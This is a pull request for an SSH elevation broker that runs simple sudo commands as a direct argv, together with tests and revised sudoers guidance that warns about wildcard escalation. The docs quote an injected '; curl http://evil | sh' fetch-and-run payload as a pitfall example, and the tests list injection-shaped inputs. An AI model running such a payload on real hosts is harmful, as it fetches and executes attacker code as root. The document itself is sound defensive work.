### PR TITLE
feat: emit direct sudo argv for simple elevated commands

### DIFF
--- a/deploy/sshd_config.snippet
+++ b/deploy/sshd_config.snippet
@@ -55,17 +55,47 @@ PermitTunnel no
 
 
 # --- Configuración de sudo (elevación NOPASSWD) ---
-# El broker usa 'sudo -n' (no interactivo). La cuenta SSH (p. ej. 'deploy')
-# debe tener entrada NOPASSWD en /etc/sudoers.d/broker:
+# El broker usa 'sudo -n' (no interactivo). Un comando SIMPLE (una sola orden,
+# sin pipes/redirecciones/expansiones) se ejecuta como argv directo:
+#     sudo -n -- systemctl restart nginx.service
+# y uno con semántica de shell conserva el envoltorio:
+#     sudo -n -- /bin/sh -c 'journalctl -u nginx | tail -n 50'
+# sudoers compara los argumentos de la regla contra el argv que RECIBE sudo,
+# unido por espacios (fnmatch). Ojo: el comando lo parsea antes la shell de
+# login de la cuenta, que quita las comillas de cada palabra — la regla debe
+# reflejar el argv ya sin comillas, no la cadena literal del force-command.
+# La cuenta SSH (p. ej. 'deploy') necesita en /etc/sudoers.d/broker:
 #
-#   # Permite al usuario 'deploy' ejecutar cualquier comando como root sin contraseña.
+#   # Atajo de laboratorio: cualquier comando como root sin contraseña.
 #   deploy ALL=(root) NOPASSWD: ALL
 #
-# Para limitar a comandos concretos (recomendado en producción):
-#   deploy ALL=(root) NOPASSWD: /usr/bin/systemctl, /usr/bin/journalctl
+# Recomendado en producción: una línea por comando simple permitido, con el
+# binario real y sus argumentos literales (espejo de command_policies):
+#   deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx.service
+#   deploy ALL=(root) NOPASSWD: /usr/bin/journalctl -u nginx --since -1h
+#
+# Comandos con semántica de shell: la regla autoriza /bin/sh con el argumento
+# envuelto. La forma de regex anclada (sudo >= 1.9.10) evita el campo de minas
+# del escapado:
+#   deploy ALL=(root) NOPASSWD: /bin/sh ^-c journalctl -u nginx \| tail -n 50$
+# Alternativa con espacios escapados — escapar SOLO los espacios: '\|' es un
+# ERROR DE SINTAXIS que invalida el fichero entero, el '|' va tal cual:
+#   deploy ALL=(root) NOPASSWD: /bin/sh -c journalctl\ -u\ nginx\ |\ tail\ -n\ 50
+#
+# PELIGROS (todos verificados con visudo -c):
+#  - Nunca comodines: fnmatch corre sin FNM_PATHNAME, '*' cruza espacios y ';'
+#    ("sh -c *" equivale a NOPASSWD: ALL; "systemctl restart *" casa con
+#    "...; curl http://evil | sh").
+#  - Las comillas dobles NO agrupan en los argumentos de un Cmnd (solo en los
+#    valores de Defaults): se comparan como bytes literales y la regla no casa.
+#  - Un '#' sin escapar trunca la regla EN SILENCIO; ',' ':' '=' '\' sin
+#    escapar invalidan el fichero entero.
 #
 # Para sudo a un usuario específico distinto de root (p. ej. 'appuser'):
 #   deploy ALL=(appuser) NOPASSWD: ALL
 #
-# Verificar configuración con:
-#   sudo -n -u root -- /bin/sh -c 'id'   # debe imprimir uid=0(root) ...
+# Verificar que una regla casa SIN ejecutar nada (como root):
+#   sudo -l -U deploy -- /usr/bin/systemctl restart nginx.service
+# Verificar la elevación end-to-end (como 'deploy'), con un comando que la
+# regla permita — con el ejemplo restrictivo de arriba:
+#   sudo -n -- systemctl restart nginx.service

--- a/docs/ARCHITECTURE.md
+++ b/docs/ARCHITECTURE.md
@@ -125,14 +125,20 @@ elevate on its own. Validation (`internal/signer/signer.go`):
 - Regex over `sudo_user` (`^[a-zA-Z0-9_][a-zA-Z0-9_.-]{0,31}$`) — rejects flags
   and metacharacters.
 - Allowlist `allowed_sudo_users` (empty = root only).
-- The command is always wrapped as `prefix -- /bin/sh -c <shellQuote(cmd)>` to
-  prevent injection.
+- A **simple** command (one statement, statically-known words — `directArgv`)
+  is handed to sudo as a direct argv: `prefix -- systemctl restart nginx.service`.
+  The host's sudoers rule then authorizes the real binary with its literal
+  arguments, mirroring the `command_policies` string (#306).
+- Anything with shell semantics (pipes, sequences, redirects, env assignments,
+  expansions, globs) is wrapped as `prefix -- /bin/sh -c <shellQuote(cmd)>` to
+  prevent injection. Capability is identical either way; only the executed form
+  differs.
 
 ### One-shot (`ssh_execute` with `sudo=true`)
 
 ```
 broker → Intent{sudo=true, sudo_user="root", command="id", purpose=oneshot}
-signer → PolicyTable.Resolve → force-command = "sudo -n -- /bin/sh -c 'id'"
+signer → PolicyTable.Resolve → force-command = "sudo -n -- id"
        → cert with force-command baked in
 sshd   → enforces the force-command; the broker cannot modify it
 ```
@@ -142,7 +148,8 @@ sshd   → enforces the force-command; the broker cannot modify it
 ```
 broker → Intent{sudo=true, purpose=session} → signer returns ElevationPrefix="sudo -n"
        → ElevationPrefix stored in liveSession.elevationPrefix
-SessionExec("ls /root") → effective command: "sudo -n -- /bin/sh -c 'ls /root'"
+SessionExec("ls /root")     → effective command: "sudo -n -- ls /root"
+SessionExec("ls / | wc -l") → effective command: "sudo -n -- /bin/sh -c 'ls / | wc -l'"
 ```
 
 ### Session `shell`/`pty` with `sudo=true`
@@ -152,18 +159,45 @@ broker → OpenShell(client, "sudo -n -- /bin/sh")   ← whole shell elevated
        → the entire session runs as root in a single sudo process
 ```
 
-Host-side config (`/etc/sudoers.d/broker`):
+Host-side config (`/etc/sudoers.d/broker`). sudoers matches the rule's
+arguments against the user's argv joined by spaces (`fnmatch(3)`), so the rule
+must mirror what the broker actually executes (#305):
 
 ```sudoers
-# SSH account 'deploy', sudo to root without password:
+# SSH account 'deploy', sudo to root without password (lab shortcut):
 deploy ALL=(root) NOPASSWD: ALL
 
-# Restricted to specific commands (recommended in production):
-deploy ALL=(root) NOPASSWD: /usr/bin/systemctl, /usr/bin/journalctl
+# Restricted per command (recommended in production) — one line per allowed
+# SIMPLE command, matching the direct argv the signer emits:
+deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx.service
+deploy ALL=(root) NOPASSWD: /usr/bin/journalctl -u nginx --since -1h
+
+# A command with shell semantics keeps the /bin/sh -c wrapper, so its rule
+# authorizes /bin/sh with the wrapped argument. The anchored-regex form (sudo
+# >= 1.9.10) avoids the escaping minefield:
+deploy ALL=(root) NOPASSWD: /bin/sh ^-c journalctl -u nginx \| tail -n 50$
 
 # Sudo to a specific user:
 deploy ALL=(appuser) NOPASSWD: ALL
 ```
+
+sudoers argument matching is a minefield — every claim here was checked against
+a live `visudo -c`:
+
+- **Never use wildcards.** `fnmatch` runs without `FNM_PATHNAME`, so `*` crosses
+  spaces and `;`: `NOPASSWD: /bin/sh -c *` is `NOPASSWD: ALL`, and even
+  `systemctl restart *` matches an injected `; curl http://evil | sh`.
+- **Double quotes do not group arguments in a `Cmnd`** (only in `Defaults`
+  values) — they are matched as literal bytes, so a quoted rule never matches.
+- In the escaped-spaces form, escape the **spaces only**: `\|` is a *syntax
+  error* that invalidates the whole file, while a bare `|` inside the escaped
+  argument is fine
+  (`/bin/sh -c journalctl\ -u\ nginx\ |\ tail\ -n\ 50` parses and matches).
+- An unescaped `#` **silently truncates** a rule; unescaped `,` `:` `=` `\`
+  invalidate the file.
+
+Non-executing check that a rule matches, as root:
+`sudo -l -U deploy -- /usr/bin/systemctl restart nginx.service`.
 
 ---
 

--- a/docs/CHANGELOG.md
+++ b/docs/CHANGELOG.md
@@ -2,6 +2,38 @@
 
 ## [Unreleased]
 
+### Changed
+- **Sudoers-friendly elevation: simple commands run as a direct sudo argv (#306)** —
+  an elevated command with no shell semantics (one statement, statically-known
+  words) is now executed as `sudo -n -- systemctl restart nginx.service` instead
+  of `sudo -n -- /bin/sh -c '…'`, so the host's least-privilege sudoers rule is
+  the natural `deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx.service`,
+  mirroring the `command_policies` string. Anything else keeps the `/bin/sh -c`
+  wrapper unchanged: pipes, sequences, redirects, env assignments, expansions,
+  globs, unquoted backslash escapes, a leading word containing `=` (sudo would
+  read it as an environment assignment) and shell-only builtins (`cd`, `umask`,
+  … — no binary for sudo to exec). Capability is identical either way; only the
+  executed form differs.
+
+  **Host-side action required if you wrote per-command sudoers rules for the
+  wrapped form.** A rule like
+  `deploy ALL=(root) NOPASSWD: /bin/sh -c systemctl\ restart\ nginx.service`
+  stops matching for that (now direct) command and sudo falls back to asking for
+  a password — rewrite it as
+  `deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx.service`.
+  Rules for compound commands are unaffected, and `NOPASSWD: ALL` deployments
+  need no change. Note the *documented* restricted rules could never match the
+  wrapped form in the first place (#305), so hand-crafted ones are the only
+  affected case.
+- **Working sudoers guidance for both elevation forms (#305)** — the sudo
+  sections of `deploy/sshd_config.snippet` and `docs/ARCHITECTURE.md` recommended
+  rules (`NOPASSWD: /usr/bin/systemctl, …`) that could never match what the broker
+  executes, leaving `NOPASSWD: ALL` as the only rule that worked. They now show
+  verified rules for the direct and wrapped forms, and the argument-matching
+  pitfalls: wildcards are an escalation (`sh -c *` ≡ `NOPASSWD: ALL`), double
+  quotes do not group arguments in a `Cmnd`, `\|` is a syntax error that
+  invalidates the file, and an unescaped `#` truncates a rule silently.
+
 ### Internal
 - **Annotate the intentional SSH remote-exec sink** — `internal/ssh/run.go` carries
   a CodeQL suppression + rationale for `go/command-injection`: the command reaching

--- a/docs/USAGE.md
+++ b/docs/USAGE.md
@@ -120,8 +120,11 @@ params:
   sudo:    true
 ```
 
-The signer bakes `sudo -n -- /bin/sh -c 'systemctl restart nginx'` into the
-cert's `force-command`. `sshd` enforces it; the broker cannot modify it.
+The signer bakes `sudo -n -- systemctl restart nginx` into the cert's
+`force-command`. `sshd` enforces it; the broker cannot modify it. A command
+with shell semantics (pipes, `&&`, redirects, …) is wrapped as
+`sudo -n -- /bin/sh -c '<cmd>'` instead — see the sudoers guidance in
+`deploy/sshd_config.snippet` for the rule each form needs.
 
 ### 2.4 With sudo to a specific user
 

--- a/internal/broker/session_test.go
+++ b/internal/broker/session_test.go
@@ -872,9 +872,9 @@ func TestBuildElevatedExecCommand(t *testing.T) {
 		command string
 		want    string
 	}{
-		{"sudo -n", "id", "sudo -n -- /bin/sh -c 'id'"},
-		{"sudo -n -u deploy", "ls /root", "sudo -n -u deploy -- /bin/sh -c 'ls /root'"},
-		{"sudo -n", "echo 'hello'", `sudo -n -- /bin/sh -c 'echo '\''hello'\'''`},
+		{"sudo -n", "id", "sudo -n -- id"},
+		{"sudo -n -u deploy", "ls /root", "sudo -n -u deploy -- ls /root"},
+		{"sudo -n", "echo 'hello'", "sudo -n -- echo hello"},
 	}
 	for _, c := range cases {
 		got := signer.BuildElevatedCommand(c.prefix, c.command)

--- a/internal/signer/cmdpolicy.go
+++ b/internal/signer/cmdpolicy.go
@@ -255,6 +255,97 @@ func literalArgs(args []*syntax.Word) (string, error) {
 	return strings.Join(parts, " "), nil
 }
 
+// directArgv reports whether command is one simple command whose words are all
+// statically known, returning its decoded argv. That is the shape that can be
+// elevated by handing the words straight to sudo — "sudo -n -- systemctl
+// restart nginx.service" — so the host's sudoers rule authorizes the real
+// binary with its literal arguments (least privilege, mirroring
+// command_policies) instead of a generic /bin/sh (#306). Anything with shell
+// semantics reports false and keeps the /bin/sh -c wrapper: pipes/sequences
+// (>1 statement or a non-CallExpr), redirects (fd-dups included — without a
+// shell nothing interprets them), env assignments, expansions, globs. The
+// checks mirror extractCommands/literalArgs; both fail closed on anything the
+// signer cannot resolve statically.
+func directArgv(command string) ([]string, bool) {
+	parser := shellParserPool.Get().(*syntax.Parser)
+	defer shellParserPool.Put(parser)
+	f, err := parser.Parse(strings.NewReader(command), "")
+	if err != nil {
+		return nil, false
+	}
+	if len(f.Stmts) != 1 {
+		return nil, false
+	}
+	stmt := f.Stmts[0]
+	if stmt.Negated || stmt.Background || stmt.Coprocess || len(stmt.Redirs) > 0 {
+		return nil, false
+	}
+	call, ok := stmt.Cmd.(*syntax.CallExpr)
+	if !ok || len(call.Assigns) > 0 || len(call.Args) == 0 {
+		return nil, false
+	}
+	// Fresh config per call: expand.Literal mutates it (see literalArgs).
+	cfg := &expand.Config{NoUnset: true}
+	argv := make([]string, 0, len(call.Args))
+	for _, w := range call.Args {
+		if !isStaticWord(w) || rejectShellExpansion(w) != nil || hasUnquotedBackslash(w) {
+			return nil, false
+		}
+		lit, err := expand.Literal(cfg, w)
+		if err != nil {
+			return nil, false
+		}
+		argv = append(argv, lit)
+	}
+	// sudo classifies a LEADING word containing '=' as a command-line environment
+	// assignment (its is_envar test is a bare strchr, with no identifier check),
+	// so such a word would silently shift which argv[0] runs as root. The shell
+	// parser only diverts NAME=value with a VALID identifier into call.Assigns
+	// ("9=x cmd" stays a plain word), so catch the rest here and let the wrapper
+	// keep the historical semantics.
+	if strings.Contains(argv[0], "=") {
+		return nil, false
+	}
+	// A shell-only builtin has no binary for sudo to exec: running it directly
+	// would fail where the wrapper's `sh -c` succeeded. Keep the wrapper so the
+	// direct form is never a capability regression.
+	if shellOnlyBuiltins[argv[0]] {
+		return nil, false
+	}
+	return argv, true
+}
+
+// hasUnquotedBackslash reports whether w carries a backslash in an UNQUOTED
+// literal part. `expand.Literal` keeps such a backslash verbatim while the
+// target shell would consume it as an escape, so the direct argv would differ
+// from what `sh -c` executes ("touch a\ b" is one argument to the shell, two
+// literal words here). Fail closed to the wrapper rather than run a different
+// command. (The same decode gap affects the policy layer for non-elevated
+// commands — tracked separately.)
+func hasUnquotedBackslash(w *syntax.Word) bool {
+	for _, part := range w.Parts {
+		if lit, ok := part.(*syntax.Lit); ok && strings.Contains(lit.Value, `\`) {
+			return true
+		}
+	}
+	return false
+}
+
+// shellOnlyBuiltins are commands implemented by the shell with no external
+// binary sudo could exec. Elevating them directly would break what the
+// `/bin/sh -c` wrapper ran, so they stay wrapped.
+var shellOnlyBuiltins = map[string]bool{
+	".": true, ":": true, "alias": true, "bg": true, "break": true,
+	"builtin": true, "cd": true, "command": true, "continue": true,
+	"declare": true, "dirs": true, "disown": true, "eval": true, "exec": true,
+	"exit": true, "export": true, "fc": true, "fg": true, "getopts": true,
+	"hash": true, "jobs": true, "let": true, "local": true, "logout": true,
+	"popd": true, "pushd": true, "read": true, "readonly": true,
+	"return": true, "set": true, "shift": true, "shopt": true, "source": true,
+	"suspend": true, "times": true, "trap": true, "type": true, "typeset": true,
+	"ulimit": true, "umask": true, "unalias": true, "unset": true, "wait": true,
+}
+
 // rejectShellExpansion fails closed on a word carrying a shell expansion that the
 // signer cannot resolve at decision time but the target shell performs at exec
 // time: pathname globbing (* ? [ ]), brace expansion ({...}), or a leading tilde

--- a/internal/signer/cmdpolicy_test.go
+++ b/internal/signer/cmdpolicy_test.go
@@ -586,3 +586,74 @@ func TestCommandPolicyValidate(t *testing.T) {
 		})
 	}
 }
+
+// TestDirectArgv locks the classifier that decides whether an elevated command
+// bypasses the /bin/sh -c wrapper (#306): only one statement of statically
+// known words qualifies; every shell-semantic shape must fail closed to the
+// wrapper. The argv must be the DECODED words (caller quoting removed), since
+// that is what sudo will compare against the sudoers rule.
+func TestDirectArgv(t *testing.T) {
+	t.Parallel()
+	simple := []struct {
+		command string
+		want    []string
+	}{
+		{"id", []string{"id"}},
+		{"systemctl restart nginx.service", []string{"systemctl", "restart", "nginx.service"}},
+		{"echo 'hello world'", []string{"echo", "hello world"}},
+		{`echo "hi"`, []string{"echo", "hi"}},
+		{"journalctl -u nginx --since -1h", []string{"journalctl", "-u", "nginx", "--since", "-1h"}},
+		{"id;", []string{"id"}},                 // one statement, just terminated
+		{`echo "a b"`, []string{"echo", "a b"}}, // quoted word keeps its space
+		{`echo ""`, []string{"echo", ""}},       // empty word survives decode
+		{"id # c", []string{"id"}},              // comment dropped, exactly as sh -c would
+	}
+	for _, c := range simple {
+		argv, ok := directArgv(c.command)
+		if !ok {
+			t.Errorf("directArgv(%q) must classify as simple", c.command)
+			continue
+		}
+		if len(argv) != len(c.want) {
+			t.Errorf("directArgv(%q) = %q, want %q", c.command, argv, c.want)
+			continue
+		}
+		for i := range argv {
+			if argv[i] != c.want[i] {
+				t.Errorf("directArgv(%q)[%d] = %q, want %q", c.command, i, argv[i], c.want[i])
+			}
+		}
+	}
+
+	compound := []string{
+		"id | wc -l",           // pipe
+		"id; id",               // sequence
+		"id && id",             // and-list
+		"id || id",             // or-list
+		"id &",                 // background
+		"! id",                 // negation
+		"echo x > /tmp/f",      // file redirect
+		"journalctl -u x 2>&1", // even fd-dup: without a shell nothing interprets it
+		"FOO=1 id",             // inline env assignment
+		"FOO=bar",              // standalone assignment
+		"echo $HOME",           // parameter expansion
+		"echo $(id)",           // command substitution
+		"ls *.log",             // glob
+		"cat {a,b}",            // brace expansion
+		"ls ~/x",               // tilde expansion
+		"(id)",                 // subshell
+		"",                     // empty
+		`touch a\\ b`,          // unquoted backslash escape (decode divergence)
+		`echo \\$HOME`,         // escaped $ — literal to us, consumed by the shell
+		"9=x systemctl status", // invalid-identifier assignment: sudo would eat it
+		"=x id",                // ditto, leading '='
+		"cd /tmp",              // shell-only builtin: no binary for sudo to exec
+		"umask 022",            // ditto
+		"export FOO=1",         // DeclClause, not a CallExpr
+	}
+	for _, cmd := range compound {
+		if argv, ok := directArgv(cmd); ok {
+			t.Errorf("directArgv(%q) must NOT classify as simple, got argv=%q", cmd, argv)
+		}
+	}
+}

--- a/internal/signer/signer.go
+++ b/internal/signer/signer.go
@@ -753,15 +753,59 @@ func resolveElevation(hp HostPolicy, in Intent) (string, error) {
 	return fmt.Sprintf("sudo -n -u %s", sudoUser), nil
 }
 
-// BuildElevatedCommand wraps command with prefix safely:
-// prefix + " -- /bin/sh -c " + ShellQuote(command).
+// BuildElevatedCommand wraps command with the sudo prefix. A simple command —
+// one statement, statically-known words (directArgv) — is handed to sudo as a
+// direct argv:
+//
+//	sudo -n -- systemctl restart nginx.service
+//
+// so the host's sudoers rule authorizes the real binary with its literal
+// arguments, mirroring the command_policies string 1:1 (#306):
+//
+//	deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx.service
+//
+// Anything else keeps the wrapper
+// prefix + " -- /bin/sh -c " + ShellQuote(command): shell semantics (pipes,
+// sequences, redirects, assignments, expansions, globs), an unquoted backslash
+// escape, a leading word containing '=' (sudo would read it as a command-line
+// env assignment), and shell-only builtins (no binary to exec) — see
+// directArgv. Capability is therefore unchanged either way; only the executed
+// form differs. The sudoers shape each form needs is documented in
+// deploy/sshd_config.snippet.
 // The double dash separates sudo options from the argument, and /bin/sh -c
 // allows pipelines, redirections, and variables (same as without elevation).
 // Exported so internal/broker's session and file-transfer paths build the
 // elevated command line through the same implementation the signer signs into a
 // force-command — divergence here is a security bug, not a style issue.
 func BuildElevatedCommand(prefix, command string) string {
+	if argv, ok := directArgv(command); ok {
+		words := make([]string, len(argv))
+		for i, w := range argv {
+			words[i] = maybeShellQuote(w)
+		}
+		return fmt.Sprintf("%s -- %s", prefix, strings.Join(words, " "))
+	}
 	return fmt.Sprintf("%s -- /bin/sh -c %s", prefix, ShellQuote(command))
+}
+
+// shellSafeWord is the alphabet a word may contain and still be passed to the
+// remote login shell bare (shlex.quote's safe set, minus '='). Everything else
+// gets ShellQuote'd — the shell strips the quotes before exec, so sudo always
+// compares the clean word; leaving safe words bare keeps the force-command, and
+// the sudoers rule that must match it, readable.
+//
+// '=' is excluded on purpose: the force-command is parsed by the target
+// ACCOUNT'S login shell, which is not necessarily POSIX. zsh (EQUALS on by
+// default) rewrites a bare leading '=word' via filename expansion before sudo
+// sees it, so the argv root runs would differ from the string the policy
+// authorised. Quoting costs nothing — sudo still compares the clean word.
+var shellSafeWord = regexp.MustCompile(`^[A-Za-z0-9@%_+:,./-]+$`)
+
+func maybeShellQuote(s string) string {
+	if shellSafeWord.MatchString(s) {
+		return s
+	}
+	return ShellQuote(s)
 }
 
 // ShellQuote wraps s in single quotes, escaping any internal single quotes

--- a/internal/signer/signer_test.go
+++ b/internal/signer/signer_test.go
@@ -173,7 +173,7 @@ func TestResolveSudoOneshotRoot(t *testing.T) {
 	if d.ElevationPrefix != "" {
 		t.Errorf("elevPrefix must be empty in one-shot, got %q", d.ElevationPrefix)
 	}
-	want := "sudo -n -- /bin/sh -c 'id'"
+	want := "sudo -n -- id"
 	if d.Constraints.ForceCommand != want {
 		t.Errorf("force-command = %q, want %q", d.Constraints.ForceCommand, want)
 	}
@@ -189,7 +189,7 @@ func TestResolveSudoOneshotUser(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	want := "sudo -n -u deploy -- /bin/sh -c 'whoami'"
+	want := "sudo -n -u deploy -- whoami"
 	if d.Constraints.ForceCommand != want {
 		t.Errorf("force-command = %q, want %q", d.Constraints.ForceCommand, want)
 	}
@@ -256,7 +256,7 @@ func TestResolveSudoOneshotCommandWithQuotes(t *testing.T) {
 	if err != nil {
 		t.Fatal(err)
 	}
-	want := `sudo -n -- /bin/sh -c 'echo '\''hello world'\'''`
+	want := `sudo -n -- echo 'hello world'`
 	if d.Constraints.ForceCommand != want {
 		t.Errorf("force-command = %q, want %q", d.Constraints.ForceCommand, want)
 	}
@@ -484,12 +484,30 @@ func TestShellQuote(t *testing.T) {
 
 // TestBuildElevatedCommand locks the exact elevated command line the signer
 // signs into a force-command and the broker sends on the session channel.
+// Simple commands go to sudo as a direct argv (their sudoers rule authorizes
+// the real binary, #306); anything with shell semantics keeps the historical
+// /bin/sh -c wrapper — capability identical, executed form different.
 func TestBuildElevatedCommand(t *testing.T) {
 	t.Parallel()
 	cases := []struct{ prefix, command, want string }{
-		{"sudo -n", "id", "sudo -n -- /bin/sh -c 'id'"},
-		{"sudo -n -u deploy", "ls /root", "sudo -n -u deploy -- /bin/sh -c 'ls /root'"},
-		{"sudo -n", "echo 'hi'", `sudo -n -- /bin/sh -c 'echo '\''hi'\'''`},
+		// Simple commands: direct argv.
+		{"sudo -n", "id", "sudo -n -- id"},
+		{"sudo -n -u deploy", "ls /root", "sudo -n -u deploy -- ls /root"},
+		{"sudo -n", "systemctl restart nginx.service", "sudo -n -- systemctl restart nginx.service"},
+		// Caller quoting is decoded to the literal argv, then re-quoted only
+		// when the word needs it for the login shell.
+		{"sudo -n", "echo 'hi'", "sudo -n -- echo hi"},
+		{"sudo -n", "echo 'hello world'", "sudo -n -- echo 'hello world'"},
+		{"sudo -n", `touch "/tmp/a;b"`, `sudo -n -- touch '/tmp/a;b'`},
+		// Shell semantics: the /bin/sh -c wrapper stays.
+		{"sudo -n", "id | wc -l", `sudo -n -- /bin/sh -c 'id | wc -l'`},
+		{"sudo -n", "id; id", `sudo -n -- /bin/sh -c 'id; id'`},
+		{"sudo -n", "id && id", `sudo -n -- /bin/sh -c 'id && id'`},
+		{"sudo -n", "echo x > /tmp/f", `sudo -n -- /bin/sh -c 'echo x > /tmp/f'`},
+		{"sudo -n", "journalctl -u app 2>&1", `sudo -n -- /bin/sh -c 'journalctl -u app 2>&1'`},
+		{"sudo -n", "FOO=1 id", `sudo -n -- /bin/sh -c 'FOO=1 id'`},
+		{"sudo -n", "echo $HOME", `sudo -n -- /bin/sh -c 'echo $HOME'`},
+		{"sudo -n", "ls *.log", `sudo -n -- /bin/sh -c 'ls *.log'`},
 	}
 	for _, c := range cases {
 		if got := BuildElevatedCommand(c.prefix, c.command); got != c.want {


### PR DESCRIPTION
Implements #306 and folds in the docs fix for #305 (the two are entangled: correcting the sudoers docs for the old wrapped form only to change that form immediately after would document it twice).

## What changes

A **simple** elevated command — one statement, statically-known words — is handed to sudo as a direct argv:

```
sudo -n -- systemctl restart nginx.service
```

so the natural least-privilege sudoers rule works and mirrors the `command_policies` string 1:1:

```sudoers
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx.service
```

`directArgv()` reuses the existing POSIX-sh machinery (`isStaticWord` / `rejectShellExpansion` / `expand.Literal`) and **fails closed to the historical `/bin/sh -c` wrapper** for everything else: pipes, sequences, redirects, env assignments, expansions, globs, unquoted backslash escapes, a leading word containing `=`, and shell-only builtins. Capability is unchanged; only the executed form differs. All three elevation call sites (one-shot force-command, sealed-exec envelope, session exec) go through the shared function.

## Hardening from adversarial review

- `=` removed from the bare-word set: zsh equals-expands a bare leading `=word` before sudo sees it, so the argv root runs would differ from the authorized string.
- Unquoted backslashes fail closed to the wrapper — `expand.Literal` keeps them verbatim while the shell consumes them, so the direct argv would differ from what `sh -c` runs.
- Leading `=`-containing words fail closed: sudo`s `is_envar` is a bare `strchr(arg, "=")` with no identifier check, so `9=x cmd` would shift which argv[0] runs as root.
- Shell-only builtins (`cd`, `umask`, …) stay wrapped so the change is never a capability regression.

## Docs (#305)

The restricted rules the docs recommended (`NOPASSWD: /usr/bin/systemctl, …`) could never match the wrapped form, so `NOPASSWD: ALL` was the only rule that worked. `deploy/sshd_config.snippet` and `docs/ARCHITECTURE.md` now carry rules **verified against a live `visudo -c`** for both forms, plus the pitfalls: wildcards are an escalation (`sh -c *` ≡ `NOPASSWD: ALL`), double quotes do not group `Cmnd` arguments, `\|` is a syntax error that invalidates the file, an unescaped `#` truncates silently.

## Compat

`NOPASSWD: ALL` deployments and compound-command rules are unaffected. Hand-crafted `sh -c` rules for now-direct simple commands must be rewritten — called out explicitly in the CHANGELOG.

## Verification

`make verify` green (gofmt + vet + build + race tests + docs gate). `TestDirectArgv` pins the classifier (simple shapes and every fail-closed shape); `TestBuildElevatedCommand` pins both emitted forms. Verified end to end against a real Debian 13 host through the MCP broker: policy → human approval → Key Vault signature → `sudo -n -- systemctl restart cron.service` → exit 0.

Closes #306
Closes #305